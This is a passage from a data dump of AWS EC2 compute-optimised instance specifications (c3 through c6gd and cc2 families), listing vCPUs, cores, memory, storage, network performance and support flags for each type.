'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 30720, 'TotalSizeInGB': 320, 'Disks': [{'SizeInGB': 160, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.4xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 30720}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 320, 'Disks': [{'SizeInGB': 160, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'supported', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 30720, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c4.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 30720}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'High', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 600, 'Disks': [{'SizeInGB': 300, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 32768, 'TotalSizeInGB': 400, 'Disks': [{'SizeInGB': 400, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5d.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 400, 'Disks': [{'SizeInGB': 400, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4, 'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 43008, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5n.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.4}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 8, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 43008}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 25 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16], 'ValidThreadsPerCore': [1], 'SizeInMiB': 32768, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16], 'ValidThreadsPerCore': [1], 'SizeInMiB': 32768, 'TotalSizeInGB': 950, 'Disks': [{'SizeInGB': 950, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.4xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 16, 'DefaultCores': 16, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 32768}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 950, 'Disks': [{'SizeInGB': 950, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': 'Up to 10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 61440, 'TotalSizeInGB': 640, 'Disks': [{'SizeInGB': 320, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c3.8xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.8}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 61440}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 640, 'Disks': [{'SizeInGB': 320, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': True, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5a.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 65536, 'TotalSizeInGB': 1200, 'Disks': [{'SizeInGB': 600, 'Count': 2, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c5ad.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 3.3}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [1, 2, 3, 4, 8, 12, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1200, 'Disks': [{'SizeInGB': 600, 'Count': 2, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 32, 'DefaultCores': 32, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32], 'ValidThreadsPerCore': [1], 'SizeInMiB': 65536, 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6g.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 32, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': False, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': True}, {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5, 'DefaultVCpus': 32, 'DefaultCores': 32, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32], 'ValidThreadsPerCore': [1], 'SizeInMiB': 65536, 'TotalSizeInGB': 1900, 'Disks': [{'SizeInGB': 1900, 'Count': 1, 'Type': 'ssd'}], 'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported', 'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'c6gd.8xlarge', 'CurrentGeneration': True, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand', 'spot'], 'SupportedRootDeviceTypes': ['ebs'], 'BareMetal': False, 'Hypervisor': 'nitro', 'ProcessorInfo': {'SupportedArchitectures': ['arm64'], 'SustainedClockSpeedInGhz': 2.5}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 32, 'DefaultThreadsPerCore': 1, 'ValidCores': [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32], 'ValidThreadsPerCore': [1]}, 'MemoryInfo': {'SizeInMiB': 65536}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 1900, 'Disks': [{'SizeInGB': 1900, 'Count': 1, 'Type': 'ssd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'default', 'EncryptionSupport': 'supported'}, 'NetworkInfo': {'NetworkPerformance': '12 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 30, 'Ipv6Supported': True, 'EnaSupport': 'required'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': True, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.6, 'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2], 'SizeInMiB': 61952, 'TotalSizeInGB': 3360, 'Disks': [{'SizeInGB': 840, 'Count': 4, 'Type': 'hdd'}], 'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'unsupported', 'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported', 'SupportedStrategies': ['cluster', 'partition', 'spread'], 'InstanceType': 'cc2.8xlarge', 'CurrentGeneration': False, 'FreeTierEligible': False, 'SupportedUsageClasses': ['on-demand'], 'SupportedRootDeviceTypes': ['ebs', 'instance-store'], 'BareMetal': False, 'Hypervisor': 'xen', 'ProcessorInfo': {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.6}, 'VCpuInfo': {'DefaultVCpus': 32, 'DefaultCores': 16, 'DefaultThreadsPerCore': 2, 'ValidCores': [2, 4, 6, 8, 10, 12, 14, 16], 'ValidThreadsPerCore': [1, 2]}, 'MemoryInfo': {'SizeInMiB': 61952}, 'InstanceStorageSupported': True, 'InstanceStorageInfo': {'TotalSizeInGB': 3360, 'Disks': [{'SizeInGB': 840, 'Count': 4, 'Type': 'hdd'}]}, 'EbsInfo': {'EbsOptimizedSupport': 'unsupported', 'EncryptionSupport': 'unsupported'}, 'NetworkInfo': {'NetworkPerformance': '10 Gigabit', 'MaximumNetworkInterfaces': 8, 'Ipv4AddressesPerInterface': 30, 'Ipv6AddressesPerInterface': 0, 'Ipv6Supported': False, 'EnaSupport': 'unsupported'}, 'PlacementGroupInfo': {'SupportedStrategies': ['cluster', 'partition', 'spread']}, 'HibernationSupported': False, 'BurstablePerformanceSupported': False, 'DedicatedHostsSupported': False, 'AutoRecoverySupported': False}, {'SupportedArchitectures': ['x86_64'], 'SustainedClockSpeedInGhz': 2.9, 'DefaultVCpus': 36, 'DefaultCores': 18, 'DefaultThreadsPerCore': 2, 